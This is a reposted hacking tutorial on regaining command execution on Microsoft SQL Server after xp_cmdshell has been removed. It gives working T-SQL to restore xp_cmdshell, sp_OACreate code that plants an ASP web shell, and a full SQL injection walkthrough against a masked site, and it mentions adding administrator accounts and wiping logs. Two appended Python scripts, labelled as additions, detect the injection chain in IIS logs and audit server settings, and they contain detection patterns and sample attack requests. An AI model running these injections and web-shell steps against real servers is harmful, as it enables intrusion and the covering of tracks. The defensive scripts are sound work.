When SA encounters XP

xiaoxiao2021-03-06  41

I keep running into the same problem during an intrusion: what do you do when you have sa but the administrator has deleted xp_cmdshell? You end up just staring at the compromised box. Today I'll go over xp_cmdshell; I hope everyone reads carefully and really understands it. In MSSQL, xp_cmdshell is an extended stored procedure which, with sysadmin privileges, executes arbitrary system commands. Administrators are not pushovers, though, and many of them remove it, which is why in a SQL injection attack getting the ability to execute xp_cmdshell is the ultimate goal. MSSQL has 8 fixed server roles: sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin and bulkadmin. Each of the 8 carries different permissions; everyone knows sysadmin is the highest, and it is the one we want. . .

Everyone knows that in MSSQL the sa account's privileges are supreme, but sometimes you get sa and still can't execute commands. Frustrating, right? Say I've obtained sa: we all connect with SqlTools.exe, a rather nice tool that I like too, heh. Let's have a look first. With sqltools.exe you can see whether the xp_cmdshell extended stored procedure has been deleted: open "Execute database command" in the "Use directory" menu and enter the command we want to run:

    SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'

If the result is 1, the extended stored procedure has not been deleted and we can execute DOS commands. And if not? There is still a way. Type directly into the database command window:

    EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
    SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'

The above restores the default stored procedure. If it returns 1 the recovery succeeded; otherwise the extended procedure's DLL has been deleted as well and you need to upload an xplog70.dll. The upload function of SqlTools.exe makes that easy: send the xplog70.dll to the target's C:\WinNT\System32 (if that fails, send it to the target's MSSQL directory) and then run in the database command window:

    EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\winnt\system32\xplog70.dll'

After that it's the usual net user and net localgroup administrators commands, plus clearing the IIS logs and the MSSQL logs, and you're done. The method above works, but we can also execute system commands without xp_cmdshell. Everyone knows that MSSQL has two extended stored procedures that can create ActiveX automation objects, heh, think about it!
We can give it a hand with the following code:

    DECLARE @o int
    EXEC sp_oacreate 'wscript.shell', @o out
    EXEC sp_oamethod @o, 'Run', NULL, 'net start telnet'

This code runs net start telnet on the server, which starts the Telnet service. The same trick manages files through the FSO: create a file and write data into it, heh, so you can write a WebShell straight onto the server!!! Hoho~~~~

    DECLARE @o int, @f int, @ret int
    EXEC sp_oacreate 'scripting.filesystemobject', @o out
    EXEC sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\mad.asp', 1
    EXEC @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run("cmd.exe /c " & request.querystring("cmd")) %>'

The code above creates c:\inetpub\wwwroot\mad.asp on the server, and we connect to it directly. If you don't believe it, try it out.

Let me now walk through an actual intrusion so everyone understands. The site we're going after is www.***.com. First comes footprinting to find the entry point. Injection is all the rage now, so let's inject; most sites are built on ASP + MSSQL. Say there is a page like www.***.com/script.asp?id=48. Use the usual and 1=1 / and 1=2 test to judge whether it is injectable, then:

    script.asp?id=48 and 1=(select @@version)

Most servers are on SP4 by now. Let's look at the privileges of its database connection account. Submit:

    www.***.com/script.asp?id=48 and 1=(select is_srvrolemember('sysadmin'))

If the page returns normally, the current connection account has the sysadmin server role, so it looks like the site connects with the sa account. Happy days, but let's double-check in case it's wrong. Submit:

    www.***.com/script.asp?id=48 and 'sa'=(select system_user)

This is used to check whether the connection account really is sa; if IE returns normally, it really is sa, so the privileges are high (to get the logged-in user, use the Transact-SQL statement SELECT SYSTEM_USER). Let's make use of the MSSQL stored procedures to get a WebShell. First see whether xp_cmdshell has been deleted by the administrator:

    www.***.com/script.asp?id=48 and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')

If it has been deleted, no problem, we'll recover it.

Submit:

    www.***.com/script.asp?id=48; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

Check whether xp_cmdshell is back by submitting:

    www.***.com/script.asp?id=48 and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')

If nothing comes back, the administrator has renamed the xplog70.dll dynamic link library, or maybe deleted it outright. Everyone can try the method above; if you have patience, read on. You can also try CZY's method, which uses two MSSQL stored procedures: the extended stored procedure xp_regread and the web assistant stored procedure sp_makewebtask. xp_regread reads registry information, and we use it to fetch the web root's absolute path that is saved in the registry. sp_makewebtask is what we use to get the WebShell: its main function is to export the records of a database table to a file whose name you can specify, and of course we specify an ASP script file. CZY has already written a very detailed article about it, so I'll only mention it briefly: create a table, add a field, put the contents of the trojan into that field, export it with the sp_makewebtask stored procedure to the web root's absolute path, then drop the temporary table you built. If you don't know how, you can find it online! But first check whether these two stored procedures have been deleted. Submit:

    www.***.com/script.asp?id=48 and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
    www.***.com/script.asp?id=48 and 1=(select count(*) from master.dbo.sysobjects where name='sp_makewebtask')

If both return normally, neither stored procedure has been deleted :) Everyone knows that Microsoft keeps a lot in the registry, and the web root location is one thing we can get from it. The location is:

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots

Using the extended stored procedure xp_regread we can get its value:

    EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/'

That fetches it, but now the problem: it is fetched, so how do we get its value back in IE? First create a temporary table with one field of type char(255); that's what holds the web root's absolute path. Once it is built, read the registry the same way but save the returned value in a variable, then add a record (the value of the variable) to the new table. That writes it into the table.

Submit:

    DECLARE @result varchar(255)
    EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output
    INSERT INTO <temporary table> (<temporary field name>) VALUES (@result);--

Then submit:

    and 1=(select count(*) from <temporary table> where <temporary field name> > 1)

Concretely, continue by submitting:

    www.***.com/script.asp?id=48; create table [dbo].[cyfd] ([gyfd] [char](255));--

That builds a table called cyfd with a char(255) field named gyfd. Then add the data to the table:

    www.***.com/script.asp?id=48; declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values (@result);--

This submission reads the web root's absolute path from the registry and inserts it into the table we just built. Now have it report the absolute path:

    www.***.com/script.asp?id=48 and 1=(select count(*) from cyfd where gyfd > 1)

IE returns an error, and in it we get the web root's absolute path, for example E:\Inetpub\wwwroot. Then drop the table we built:

    www.***.com/script.asp?id=48; drop table cyfd;--

Now that we know the path there is plenty to do. Getting a WebShell is no problem, so get the WebShell, upload xplog70.dll through it into the E:\Inetpub\wwwroot directory, and then restore xp_cmdshell. Submit:

    www.***.com/script.asp?id=48; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'e:\inetpub\wwwroot\xplog70.dll'

(restoration supports an absolute path!) Use IE to check whether it has been restored. Submit:

    www.***.com/script.asp?id=48 and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')

If IE returns normally, it has been restored! Next let's create a user. . . .
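Seen from the defending side, every step of the walk-through above leaves a line in the IIS log: the and 1=1 / and 1=2 probes, the is_srvrolemember and system_user fingerprinting, the sysobjects lookups for xp_cmdshell, the stacked ;exec sp_addextendedproc restore and the xp_regread, sp_makewebtask and sp_OACreate calls from the earlier section. The Python script below is an added example, not code from the original post or from any tool it names. It assumes IIS W3C Extended logging with the date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query and sc-status fields; the lines in SAMPLE_LOG are constructed to mirror the requests in the article, and the weights and severity thresholds are my own choice.

```python
"""IIS W3C log triage for the MSSQL injection chain walked through above.

Added example (not from the original post). Assumes IIS W3C Extended logging
with at least: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log, not real traffic. 203.0.113.7 walks the article's
# chain; 198.51.100.2 is ordinary browsing and must produce no finding.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2021-03-06 10:00:01 203.0.113.7 GET /script.asp id=48+and+1%3D1 200
2021-03-06 10:00:02 203.0.113.7 GET /script.asp id=48+and+1%3D2 500
2021-03-06 10:00:05 203.0.113.7 GET /script.asp id=48+and+1%3D(select+is_srvrolemember('sysadmin')) 200
2021-03-06 10:00:09 203.0.113.7 GET /script.asp id=48+and+1%3D(select+count(*)+from+master.dbo.sysobjects+where+xtype%3D'X'+and+name%3D'xp_cmdshell') 500
2021-03-06 10:00:15 203.0.113.7 GET /script.asp id=48%3Bexec+master.dbo.sp_addextendedproc+'xp_cmdshell','xplog70.dll' 200
2021-03-06 10:00:30 203.0.113.7 GET /script.asp id=48%3Bdeclare+@r+varchar(255)+exec+master.dbo.xp_regread+'HKEY_LOCAL_MACHINE','SYSTEM%5CControlSet001%5CServices%5CW3SVC%5CParameters%5CVirtual+Roots','/',@r+output+insert+into+cyfd(gyfd)+values(@r);-- 200
2021-03-06 10:00:41 203.0.113.7 GET /script.asp id=48%3Bdrop+table+cyfd;-- 200
2021-03-06 10:01:00 198.51.100.2 GET /script.asp id=48 200
2021-03-06 10:01:03 198.51.100.2 GET /products.asp id=12&page=2 200
"""

# (tag, weight, pattern over the decoded, lower-cased query). Weight 5 marks
# procedures that reach outside the database; one of them alone rates "high".
RULES = [
    ("boolean_probe",       1, re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("fingerprint",         2, re.compile(r"@@version|system_user|is_srvrolemember")),
    ("xp_cmdshell_check",   2, re.compile(r"sysobjects\b.*\bxp_cmdshell")),
    ("stacked_query",       2, re.compile(r";\s*(?:exec|execute|declare|create|insert|drop)\b")),
    ("xp_cmdshell_restore", 5, re.compile(r"sp_addextendedproc")),
    ("registry_read",       5, re.compile(r"xp_regread")),
    ("file_export",         5, re.compile(r"sp_makewebtask")),
    ("ole_automation",      5, re.compile(r"sp_oacreate|sp_oamethod")),
    ("command_exec",        5, re.compile(r"exec(?:ute)?\s+(?:[\w.]+\.)?xp_cmdshell\b")),
]


def parse_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        values = line.split()
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def normalize(query):
    """URL-decode twice (undoes double encoding), squash whitespace, lower-case."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(query):
    """Return (set of tags, score) for one cs-uri-query value."""
    q = normalize(query)
    tags, score = set(), 0
    for tag, weight, pattern in RULES:
        if pattern.search(q):
            tags.add(tag)
            score += weight
    return tags, score


def analyze(text):
    """Aggregate tagged requests per client IP and rate each client."""
    per_ip = defaultdict(lambda: {"hits": 0, "score": 0, "errors": 0, "tags": set()})
    for rec in parse_w3c(text):
        tags, score = classify(rec.get("cs-uri-query", "-"))
        if not tags:
            continue
        entry = per_ip[rec["c-ip"]]
        entry["hits"] += 1
        entry["score"] += score
        entry["tags"] |= tags
        # A 5xx answering a probe is the error-based leak the article relies on
        # (the conversion error that discloses the web root).
        if rec.get("sc-status", "").startswith("5"):
            entry["errors"] += 1
    report = {}
    for ip, e in per_ip.items():
        severity = "high" if e["score"] >= 5 else "medium" if e["score"] >= 2 else "low"
        report[ip] = {"hits": e["hits"], "score": e["score"], "errors": e["errors"],
                      "tags": sorted(e["tags"]), "severity": severity}
    return report


if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {finding['severity']} (score {finding['score']}, "
              f"{finding['hits']} requests, {finding['errors']} server errors)")
        for tag in finding["tags"]:
            print(f"  - {tag}")
```

Run it against a real log by passing the file's contents to analyze(). The per-client aggregation matters more than any single pattern: the article's chain starts with harmless-looking and 1=1 probes and only later reaches sp_addextendedproc, so a client that accumulates probes, fingerprinting and server errors on the same script is worth pulling the database audit for even before a weight-5 procedure shows up.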
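The server-side counterpart is to audit the posture the post exploits in both sections: xp_cmdshell re-registered with sp_addextendedproc from a DLL that sits outside the instance's Binn directory (the web root, in the example above), OLE automation through sp_OACreate left enabled, and the web application's login being a member of sysadmin. The script below is an added example, not from the original post. AUDIT_QUERIES holds the catalog queries a DBA would run to collect the evidence (SQL Server 2005 or later for the two sp_configure options; on SQL Server 2000 those rows are simply absent and only the extended-procedure and role checks apply); the SAMPLE_* rows are constructed stand-ins for their output, and the Binn path and the webapp login name are assumptions.

```python
"""Posture audit for the MSSQL tricks in the post: xp_cmdshell re-registered
from an arbitrary DLL, OLE automation left on, web app login in sysadmin.

Added example (not from the original post). AUDIT_QUERIES are the T-SQL a DBA
runs (SQL Server 2005+ for the sys.configurations options); the SAMPLE_* rows
are constructed stand-ins for their result sets. BINN_DIR and 'webapp' are
assumptions.
"""
import ntpath

AUDIT_QUERIES = {
    "configurations": (
        "SELECT name, CAST(value_in_use AS int) FROM sys.configurations "
        "WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');"),
    "extended_procs": "SELECT name, dll_name FROM master.sys.extended_procedures;",
    "logins": (
        "SELECT name, IS_SRVROLEMEMBER('sysadmin', name) "
        "FROM sys.server_principals WHERE type IN ('S', 'U');"),
}

# Stock DLL that ships the procedure the post restores; anything else
# registered under that name is a replaced or relocated binary.
STOCK_DLL = {"xp_cmdshell": "xplog70.dll"}

# Constructed sample results (not from a real server): the state the post's
# walk-through leaves behind, with xp_cmdshell re-registered from the web root.
BINN_DIR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn"   # assumption
SAMPLE_CONFIG = [("xp_cmdshell", 1), ("Ole Automation Procedures", 0)]
SAMPLE_EXTPROCS = [("xp_cmdshell", r"e:\inetpub\wwwroot\xplog70.dll"),
                   ("xp_regread", "xpstar.dll")]
SAMPLE_LOGINS = [("sa", 1), ("webapp", 1), ("reporting", 0)]
APP_LOGINS = ["webapp"]   # logins the web tier connects with (assumption)


def is_stock_location(dll_name, binn_dir=BINN_DIR):
    """True if the DLL is a bare file name (resolved from the instance's own
    search path, as the stock registration is) or lives under Binn. A full
    path anywhere else is how the post brings xp_cmdshell back from a web root."""
    dll = ntpath.normpath(dll_name).lower()
    if not ntpath.dirname(dll):
        return True
    base = ntpath.normpath(binn_dir).lower().rstrip("\\") + "\\"
    return dll.startswith(base)


def audit(config_rows, extproc_rows, login_rows, app_logins, binn_dir=BINN_DIR):
    """Return a list of (severity, problem, remediation T-SQL) findings."""
    findings = []
    config = {name: int(value) for name, value in config_rows}
    for option in ("xp_cmdshell", "Ole Automation Procedures"):
        if config.get(option, 0) != 0:      # option absent on SQL 2000: nothing to report
            findings.append(("high", f"'{option}' is enabled",
                             "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
                             f"EXEC sp_configure '{option}', 0; RECONFIGURE;"))
    for name, dll in extproc_rows:
        if not is_stock_location(dll, binn_dir):
            findings.append(("high", f"{name} is registered from {dll}, outside {binn_dir}",
                             f"EXEC sp_dropextendedproc '{name}'; -- then examine that DLL"))
        elif name in STOCK_DLL and ntpath.basename(dll).lower() != STOCK_DLL[name]:
            findings.append(("high", f"{name} is backed by {dll}, not {STOCK_DLL[name]}",
                             f"EXEC sp_dropextendedproc '{name}'; -- then examine that DLL"))
    sysadmins = {name for name, member in login_rows if member == 1}
    for login in app_logins:
        if login in sysadmins:
            findings.append(("high", f"web application login '{login}' is a sysadmin",
                             f"EXEC sp_dropsrvrolemember '{login}', 'sysadmin';"))
    return findings


if __name__ == "__main__":
    for severity, problem, fix in audit(SAMPLE_CONFIG, SAMPLE_EXTPROCS, SAMPLE_LOGINS, APP_LOGINS):
        print(f"[{severity}] {problem}\n    fix: {fix}")
```

The DLL-location check is the one that catches the restoration trick specifically: the post's whole point is that sp_addextendedproc accepts an absolute path, so a clean sysobjects count of 1 for xp_cmdshell says nothing about which binary is behind it. The sysadmin check is the defender's reading of the same IS_SRVROLEMEMBER('sysadmin') query the attacker submits through the injection point; if the web tier's login answers 1, everything else in the article follows from one injectable parameter.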

Please credit the original source when reposting: https://www.9cbs.com/read-74681.html
